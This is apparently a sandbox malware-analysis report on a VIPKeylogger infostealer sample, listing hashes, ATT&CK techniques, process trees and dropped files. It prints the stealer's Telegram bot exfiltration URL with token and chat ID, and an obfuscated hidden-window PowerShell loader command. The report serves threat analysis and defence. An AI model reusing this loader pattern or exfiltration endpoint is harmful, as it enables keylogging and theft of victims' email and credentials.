vipkeylogger | 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-12-2024 15:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

pedido-035241.exe
Size

1.0MB
MD5

68ad57514cfb4e1cb4529556dbbc9b73
SHA1

3681d090c965cd8af1c7bffd6fe5427e997daa41
SHA256

4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac
SHA512

f2ef34f8ad5282676bdc3913007d471cc59e1bf20c5371817b3c85a2c24c19983d3c6c2f5e00bb539fc6596a0b02b4a33e59a4391a4165c22e0cbf2edd103f5a
SSDEEP

24576:ENrNYo6GP6fzfqUC1tkth3VwV5k7j5awX300zQUGtZq:U+S6fziUC1wh3VwXgj5aEkHUGtZq

Score

10^/10

vipkeylogger collection discovery execution keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendMessage?chat_id=7763958191

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4348	powershell.exe

Loads dropped DLL 1 IoCs

pid	Process
4872	pedido-035241.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

Blocklisted process makes network request 8 IoCs

flow	pid	Process
36	4340	msiexec.exe
39	4340	msiexec.exe
41	4340	msiexec.exe
43	4340	msiexec.exe
45	4340	msiexec.exe
49	4340	msiexec.exe
52	4340	msiexec.exe
55	4340	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
35	drive.google.com
36	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
48	checkip.dyndns.org

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\stilhederne\tamtammens.ini	pedido-035241.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4340	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4348	powershell.exe
4340	msiexec.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\inddatafunktionens.Tra	pedido-035241.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pedido-035241.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4348	powershell.exe
4348	powershell.exe
4348	powershell.exe
4348	powershell.exe
4348	powershell.exe
4348	powershell.exe
4348	powershell.exe
4340	msiexec.exe
4340	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4348	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeIncreaseQuotaPrivilege	4348	powershell.exe
Token: SeSecurityPrivilege	4348	powershell.exe
Token: SeTakeOwnershipPrivilege	4348	powershell.exe
Token: SeLoadDriverPrivilege	4348	powershell.exe
Token: SeSystemProfilePrivilege	4348	powershell.exe
Token: SeSystemtimePrivilege	4348	powershell.exe
Token: SeProfSingleProcessPrivilege	4348	powershell.exe
Token: SeIncBasePriorityPrivilege	4348	powershell.exe
Token: SeCreatePagefilePrivilege	4348	powershell.exe
Token: SeBackupPrivilege	4348	powershell.exe
Token: SeRestorePrivilege	4348	powershell.exe
Token: SeShutdownPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeSystemEnvironmentPrivilege	4348	powershell.exe
Token: SeRemoteShutdownPrivilege	4348	powershell.exe
Token: SeUndockPrivilege	4348	powershell.exe
Token: SeManageVolumePrivilege	4348	powershell.exe
Token: 33	4348	powershell.exe
Token: 34	4348	powershell.exe
Token: 35	4348	powershell.exe
Token: 36	4348	powershell.exe
Token: SeDebugPrivilege	4340	msiexec.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 4872 wrote to memory of 4348	4872	pedido-035241.exe	82
PID 4872 wrote to memory of 4348	4872	pedido-035241.exe	82
PID 4872 wrote to memory of 4348	4872	pedido-035241.exe	82
PID 4348 wrote to memory of 4340	4348	powershell.exe	91
PID 4348 wrote to memory of 4340	4348	powershell.exe	91
PID 4348 wrote to memory of 4340	4348	powershell.exe	91
PID 4348 wrote to memory of 4340	4348	powershell.exe	91

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

C:\Users\Admin\AppData\Local\Temp\pedido-035241.exe
"C:\Users\Admin\AppData\Local\Temp\pedido-035241.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4872
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\Admin\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4348
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\SysWOW64\msiexec.exe"
    3⤵
    - Accesses Microsoft Outlook profiles
    - Blocklisted process makes network request
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:4340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jrfib2l3.2t4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\globosely\baadehavn\stnner\Unpursuing.Ecc

Filesize
290KB

MD5
ac443ed3bcda8fd27eab8e4719631588

SHA1
6e501a1d2959a2279c67ff2b635950b72c537df8

SHA256
050e2941abcf6621568720f75c7d27b1bc7b57f4a2db95dd44701aab68996042

SHA512
f4e6440cecee0b5c2197e1f77757501b45cfa1fb14389944b3f775e5611accf946a1d6625e8758592636f26f05f41aed7309de4b6cae22cb1a3b8d18730df69c

Download Submit
C:\Users\Admin\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns

Filesize
69KB

MD5
5c166ac0df5b33d27a3157ff3484b1d8

SHA1
14f38ae3f4ed43ab6f47cad5859e4494408092c5

SHA256
c1203a1fc75a7592b8916f61c403ca3eebed1b1d84cd3c7eaa89187ee665229c

SHA512
89a6e8a42ac4fc4b8618c3e79300126e49128c238e91f557a573edd7905a8fb35cb601e422b0a55ee74ccbb274e228314cf27741e8b3b70b532d3980328e89b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\nskD15B.tmp\nsExec.dll

Filesize
7KB

MD5
675c4948e1efc929edcabfe67148eddd

SHA1
f5bdd2c4329ed2732ecfe3423c3cc482606eb28e

SHA256
1076ca39c449ed1a968021b76ef31f22a5692dfafeea29460e8d970a63c59906

SHA512
61737021f86f54279d0a4e35db0d0808e9a55d89784a31d597f2e4b65b7bbeec99aa6c79d65258259130eeda2e5b2820f4f1247777a3010f2dc53e30c612a683

Download Submit
memory/4340-87-0x0000000000F00000-0x0000000002154000-memory.dmp

Filesize
18.3MB

Download
memory/4340-89-0x0000000000F00000-0x0000000000F4A000-memory.dmp

Filesize
296KB

Download
memory/4340-98-0x0000000022230000-0x000000002223A000-memory.dmp

Filesize
40KB

Download
memory/4340-97-0x0000000024D70000-0x0000000024E02000-memory.dmp

Filesize
584KB

Download
memory/4340-94-0x0000000025AC0000-0x0000000025FEC000-memory.dmp

Filesize
5.2MB

Download
memory/4340-93-0x0000000024BF0000-0x0000000024C40000-memory.dmp

Filesize
320KB

Download
memory/4340-92-0x00000000253C0000-0x0000000025582000-memory.dmp

Filesize
1.8MB

Download
memory/4340-90-0x0000000024720000-0x00000000247BC000-memory.dmp

Filesize
624KB

Download
memory/4340-88-0x0000000000F00000-0x0000000002154000-memory.dmp

Filesize
18.3MB

Download
memory/4348-53-0x0000000007330000-0x00000000073D3000-memory.dmp

Filesize
652KB

Download
memory/4348-59-0x0000000007640000-0x0000000007648000-memory.dmp

Filesize
32KB

Download
memory/4348-30-0x0000000005F20000-0x0000000005F6C000-memory.dmp

Filesize
304KB

Download
memory/4348-33-0x0000000006440000-0x00000000064D6000-memory.dmp

Filesize
600KB

Download
memory/4348-34-0x00000000063F0000-0x000000000640A000-memory.dmp

Filesize
104KB

Download
memory/4348-35-0x0000000006ED0000-0x0000000006EF2000-memory.dmp

Filesize
136KB

Download
memory/4348-36-0x0000000007730000-0x0000000007CD4000-memory.dmp

Filesize
5.6MB

Download
memory/4348-38-0x0000000008360000-0x00000000089DA000-memory.dmp

Filesize
6.5MB

Download
memory/4348-41-0x000000006FCA0000-0x000000006FCEC000-memory.dmp

Filesize
304KB

Download
memory/4348-40-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-39-0x00000000072E0000-0x0000000007312000-memory.dmp

Filesize
200KB

Download
memory/4348-51-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-52-0x00000000072C0000-0x00000000072DE000-memory.dmp

Filesize
120KB

Download
memory/4348-28-0x0000000005930000-0x0000000005C84000-memory.dmp

Filesize
3.3MB

Download
memory/4348-54-0x0000000007450000-0x000000000745A000-memory.dmp

Filesize
40KB

Download
memory/4348-55-0x00000000075B0000-0x00000000075C1000-memory.dmp

Filesize
68KB

Download
memory/4348-56-0x0000000007600000-0x000000000760E000-memory.dmp

Filesize
56KB

Download
memory/4348-57-0x0000000007610000-0x0000000007624000-memory.dmp

Filesize
80KB

Download
memory/4348-58-0x0000000007650000-0x000000000766A000-memory.dmp

Filesize
104KB

Download
memory/4348-29-0x0000000005EF0000-0x0000000005F0E000-memory.dmp

Filesize
120KB

Download
memory/4348-60-0x00000000076A0000-0x00000000076CA000-memory.dmp

Filesize
168KB

Download
memory/4348-61-0x00000000076D0000-0x00000000076F4000-memory.dmp

Filesize
144KB

Download
memory/4348-62-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-64-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-63-0x000000007381E000-0x000000007381F000-memory.dmp

Filesize
4KB

Download
memory/4348-65-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-67-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-69-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-68-0x00000000089E0000-0x000000000CFBB000-memory.dmp

Filesize
69.9MB

Download
memory/4348-70-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-71-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-17-0x0000000005850000-0x00000000058B6000-memory.dmp

Filesize
408KB

Download
memory/4348-18-0x00000000058C0000-0x0000000005926000-memory.dmp

Filesize
408KB

Download
memory/4348-16-0x0000000005040000-0x0000000005062000-memory.dmp

Filesize
136KB

Download
memory/4348-15-0x0000000005220000-0x0000000005848000-memory.dmp

Filesize
6.2MB

Download
memory/4348-14-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-13-0x0000000002900000-0x0000000002936000-memory.dmp

Filesize
216KB

Download
memory/4348-12-0x000000007381E000-0x000000007381F000-memory.dmp

Filesize
4KB

Download
memory/4348-72-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download
memory/4348-74-0x0000000073810000-0x0000000073FC0000-memory.dmp

Filesize
7.7MB

Download